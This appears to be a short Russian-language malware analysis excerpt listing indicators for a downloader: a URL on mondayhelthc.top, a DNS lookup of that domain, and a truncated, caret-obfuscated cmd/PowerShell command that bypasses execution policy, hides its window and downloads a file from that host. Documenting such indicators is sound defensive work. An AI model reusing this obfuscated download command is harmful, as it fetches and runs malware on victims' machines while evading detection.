Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^ErSHEll^.^Ex^e -e^xeCuTIonPolic^y B^y^P^ASS^ -N^OprOF^Il^e -winDOw^s^t^yLe^ Hi^Dd^e^n ^(N^E^w-ObJe^Ct^ ^sySTem.^nET.w^E^bcl^IEn^T).^D^ow^NlOA^dFI^lE^(^'http://mondayhelth...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^ErSHEll^.^Ex^e -e^xeCuTIonPolic^y B^y^P^ASS^ -N^OprOF^Il^e -winDOw^s^t^yLe^ Hi^Dd^e^n ^(N^E^w-ObJe^Ct^ ^sySTem.^nET.w^E^bcl^IEn^T).^D^ow^NlOA^dFI^lE^(^'http://mondayhelth...' (со скрытым окном)